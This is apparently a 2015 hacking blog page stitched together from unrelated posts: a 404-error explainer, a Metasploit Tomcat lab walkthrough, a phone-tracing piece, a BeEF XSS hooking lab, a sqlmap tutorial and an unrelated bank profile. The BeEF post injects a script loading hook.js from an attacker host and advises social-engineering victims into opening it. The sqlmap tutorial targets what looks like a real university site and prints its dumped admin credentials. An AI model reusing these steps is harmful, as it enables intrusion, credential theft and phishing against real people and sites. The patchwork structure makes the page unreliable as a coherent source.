Wednesday, January 21, 2015

What is 404 Error ?



While Browsing through net you all might probably encounter this “Error 404?Page not found” is the error page displayed whenever requested page is simply not available on your site. The reason for this might occur is that there may be a link on your site that was wrong or the page might have been recently removed from the site. As there is no web page to display, the web server sends a page that simply says “404 Page not found”.
------------------------------------------
When we expand the code 404, the first digit “4” represents a client error. The server indicates that you did a mistake like misspelling the URL or requesting for a page that is no longer available.

Then What is 404 Error 

The middle digit, 0 represents a general syntax error and could indicate a spelling mistake.

The last digit, 4 refers to a specific error in the group of 40x.

The 404 error message is an HTTP (Hypertext Transfer Protocol) standard status code. This “Not Found” response code indicates that although the client could communicate to the server, the server could not find what was requested or it was configured not to fulfill the request.

The 404 “Not Found” error is not the same as the “Server Not Found” error which you see whenever a connection to the destination server could not be established at all.

So What is 404 Error 

Whenever you visit a web page, your computer will request data from a server through HTTP. Even before the requested page is displayed in your browser, the web server will send the HTTP header that has the status code. The status code provides information about the status of the request. A normal web page gets the status code as 200. But we do not see this as the server proceeds to send the contents of the page. It’s only when there is an error, we see the status code 404 Not Found.

Exploit Apache Tomcat


Hello Friends,
Today i am showing you how to exploit apache tomcat machine.
Basic setup we require is
1.VMWare Workstation
2.Metasploitable
3.Kali Linux or Backtrack 5R3
Steps
Start Metasploitable and Kali Linux in VMWare Workstation and see their IP S
Scan Metasploitable IP In Kali Linux using NMAP tool
nmap -sV 192.168.230.133 (Metasploitable IP)
then we will get all services running and versions of service on the target machine 
we finded that "Apache Tomcat" is running on the port number 8180
Now search for related exploit
In kali linux start metasploit and type "search tomcat"
msf>search tomcat
In this select for best exploit
Here " exploit/multi/http/tomcat_mgr_deploy " is excellent
so go with that only , but before going for exploit know about that exploit
To know information about exploit
msf > info exploit/multi/http/tomcat_mgr_deploy
for this exploit to run we require USERNAME and PASSWORD of tomcat server that we do not having
so next once again come to msf
msf > search tomcat
here you having one auxillary that may help in getting USERNAME and PASSWORD
msf > info auxiliary/scanner/http/tomcat_mgr_login
msf > use auxiliary/scanner/http/tomcat_mgr_login
and set RHOST,RPORT and type run (not exploit , we are running auxiliary not the exploit)
 Now you will get the USERNAME and PASSWORD of tomcat
we got the username = tomcat and password = tomcat
After getting username and password use exploit
 Now set all options like RHOST etc
 Now type EXPLOIT
The box has been exploited

How to Trace Mobile Phone Numbers

 


Today in India (Not only in india ) everyone from child to older man is having mobile phones. with the rapid growth if mobile phone usage in recent years, we have often observed that the mobile has become a part of many illegal and criminal activities. So in most cases tracing a mobile number is became a vital part in the investigating process. Also sometimes we just want to trace a mobile number for reasons like prank calls and blackmails and missed calls.

Even though it is not possible to trace the caller, it is possible to trace location of the caller and can find the phone network which is using. Just have a look at the page on Tracing Indian Mobile Numbers from Wikipedia. It is sure that we can trace any number, Location(state) and Network of mobile phone of the caller. The wiki is updated regularly so as to provide up-to-date information on newly added mobile numbers.

If you would like much simper interface where you can enter just mobile phone number and you will get country,state,city and network operator information.

Then you can try this links :
 

By using this information you can trace where the caller is but not who the caller is and his name and information about him. So if you are in emergency and need to find actual person behind the call, i recommend that you file a complaint and take help of police.

BeEF Lab

BeEF Lab


Hello friends

we seen how to start and test BeEF in the previous post. Now in this post we will be seeing how to work with XSS Vulnerability by using BeEF Framework.

Lab Setting:


1.XP Virtual Machine (Victim)
2.Backtrack VM (Attacker)

Attacker:

1.Start BeEF in the Backtrack.

Now we will get the UI URL and the HOOK URL



2.Open the browser (any browser but firefox is preferable)

3.Copy the UI URL from the terminal and paste it in a URL of a browser http://192.168.0.103:3000/ui/panel

4.Now you will get the login screen of beef

5.Enter the username and password as beef/beef



6.Take any site that is vulnerable to xss ex: demo.testfire.net

7.Check for the cross site scripting vulnerability with simple script <script>alert(123);</script>



8.paste that script in the search box of demo.testfire.net



9.See if you are getting the pop up box or not



10.see the URL in the website http://demo.testfire.net/search.aspx?txtSearch=<script>alert(123);</script>

11.Frame the URL with like this <script src=http://192.168.0.103:3000/hook.js></script>

http://demo.testfire.net/search.aspx?txtSearch=<script src=http://192.168.0.103:3000/hook.js></script>



12.perform some social engineering to send the link to victim by using the mail or chat

Victim:

1.Now victim open the link the attacker sended nothing changed, the page is as usual

Attacker:

when ever the victim opens that link check in the beef user interface

the beef will create a zombie of victim system

click on the zombie which created



Go to the Commands tab --> Misc --> Raw javascript --> Execute



and see in the victim machine i.e,XP



now u can execute what ever the commands u want on the victim machine.

in the next post i will show how to integrate the metasploit with the beef framework

SQLmap Step By Step Tutorial

SQLmap Step By Step Tutorial

Today we will see the step-by-step tutorial of Sqlmap.
Sqlmap is developed in Python and it is available with Backtrack 5 and Backtrack 5 R1 and all versions of Backtrak, Otherwise you can download seperately also from

$ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

Sqlmap is is best sql injection tool.

With sqlmap we can know the database name and type of database i.e,Mysql or SqlServer or ........ and we can find the database name and tables related to that database and we can dump the data from the database.
It is totally a database takeover tool

Steps:

1.First we require the vulnerable target and here it is

http://www.hu.edu.pk/viewfaculty.php?id=12

2.Go to Backtrack and type cd /pentest/database/sqlmap




3.Run the sqlmap

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12

-u is the vulnerable url



./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --dbs

or

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --current-db




if you write as --dbs then it will fetch all the databases in the server

and if you write --current-db then it will fetch only the database related to the current website

we will get the database name

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results --tables



Here after -D we have to give the database name

--tables means we are trying to fetch the tables in the current database

and we will get the table names



after that we have to fetch only the table information which we required

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns

we will get the names of columns in that table with datatype





./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C id,passwrd,u_name --dump



now we will get the total information in the table "admin"






After finishing all the process you r having




Database Name : c3results
No of tables :48
Admin Table Name : admin
admin username : 123_admin_123
admin password : 123_hazara_123

State Bank of India (NSE:SBIN



State Bank of India (SBI) is an India-based commercial bank. Its primary banks include Treasury, Corporate / Wholesale Banking, Retail Banking and Other Banking business. The Treasury Segment includes the entire investment portfolio and trading in foreign exchange contracts and derivative contracts. The Corporate / Wholesale Banking segment comprises the lending activities of Corporate Accounts Group, Mid Corporate Accounts Group and Stressed Assets Management Group. These include providing loans and transaction services to corporate and institutional clients and further include non-treasury operations of foreign offices. The Retail Banking Segment consists of branches in National Banking Group, which primarily includes Personal Banking activities, including lending activities to corporate customers having banking relations with branches in the National Banking Group. This segment also includes agency business and automated teller machines (ATMs).